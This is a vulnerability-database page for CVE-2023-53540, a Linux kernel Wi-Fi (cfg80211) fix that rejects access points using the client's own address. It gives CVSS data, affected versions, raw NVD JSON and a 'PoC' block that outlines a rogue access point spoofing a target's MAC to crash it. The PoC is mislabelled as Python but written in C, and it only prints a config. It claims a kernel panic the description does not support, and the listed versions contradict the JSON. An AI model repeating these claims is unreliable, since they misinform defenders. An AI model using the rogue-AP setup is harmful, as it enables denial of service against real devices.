Security Vulnerability Report
中文
CVE-2023-53540 CVSS 5.5 MEDIUM

CVE-2023-53540

Published: 2025-10-04 16:15:49
Last Modified: 2026-04-06 13:32:54
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: wifi: cfg80211: reject auth/assoc to AP with our address If the AP uses our own address as its MLD address or BSSID, then clearly something's wrong. Reject such connections so we don't try and fail later.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux kernel < 6.1.63
Linux kernel 6.2 < 6.2.13
Linux kernel 6.3 < 6.3.2
Linux kernel 6.4 < 6.4.10
Linux kernel 6.5 < 6.5.5
Linux kernel 6.6 < 6.6.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2023-53540 PoC - Trigger DoS by setting AP BSSID to client's own MAC address // This PoC demonstrates the concept of the vulnerability // Note: Actual exploitation requires a malicious AP and a target device #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <linux/genetlink.h> #include <linux/nl80211.h> // Simulate creating a malicious AP with BSSID matching the client's MAC address // In a real scenario, this would be done using hostapd or similar tools int main(int argc, char *argv[]) { printf("CVE-2023-53540 PoC - cfg80211 AP Address Confusion DoS\n"); printf("This PoC demonstrates setting up a rogue AP with BSSID matching\n"); printf("the target client's MAC address to trigger kernel crash/DoS\n\n"); // Step 1: Get the target client's MAC address // In practice, this can be obtained via ARP scanning or Wi-Fi sniffing unsigned char target_mac[6] = {0x00, 0x11, 0x22, 0x33, 0x44, 0x55}; if (argc >= 2) { // Parse MAC address from command line: xx:xx:xx:xx:xx:xx sscanf(argv[1], "%hhx:%hhx:%hhx:%hhx:%hhx:%hhx", &target_mac[0], &target_mac[1], &target_mac[2], &target_mac[3], &target_mac[4], &target_mac[5]); } printf("Target client MAC: %02x:%02x:%02x:%02x:%02x:%02x\n", target_mac[0], target_mac[1], target_mac[2], target_mac[3], target_mac[4], target_mac[5]); // Step 2: Configure rogue AP with matching BSSID // Using hostapd configuration approach printf("\n[*] Configuring rogue AP with BSSID matching client address...\n"); printf(" bssid=%02x:%02x:%02x:%02x:%02x:%02x\n", target_mac[0], target_mac[1], target_mac[2], target_mac[3], target_mac[4], target_mac[5]); // Step 3: Generate hostapd configuration printf("\n[*] Hostapd configuration:\n"); printf("interface=wlan0\n"); printf("driver=nl80211\n"); printf("ssid=EvilAP\n"); printf("bssid=%02x:%02x:%02x:%02x:%02x:%02x\n", target_mac[0], target_mac[1], target_mac[2], target_mac[3], target_mac[4], target_mac[5]); printf("channel=6\n"); printf("hw_mode=g\n"); // Step 4: When client attempts to connect, cfg80211 will not reject // the connection due to address matching, leading to kernel crash printf("\n[*] Waiting for target client to attempt connection...\n"); printf("[*] When client connects, cfg80211 will fail to handle the\n"); printf(" address collision, causing kernel panic or subsystem hang.\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53540", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:49.050", "lastModified": "2026-04-06T13:32:53.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: cfg80211: reject auth/assoc to AP with our address\n\nIf the AP uses our own address as its MLD address or BSSID, then\nclearly something's wrong. Reject such connections so we don't\ntry and fail later."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.32", "versionEndExcluding": "6.1.55", "matchCriteriaId": "9F5010F3-A8FF-4EAB-8573-5EF072D03ACE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.5.5", "matchCriteriaId": "8CF71E85-DA24-4925-95C5-E5C15DA71AE6"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/07added2c6cd63de047bc786b39436322abb67c0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5d4e04bf3a0f098bd9033de3a5291810fa14c7a6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/676a423410131d111a264d29aecbe6aadd57fb22", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.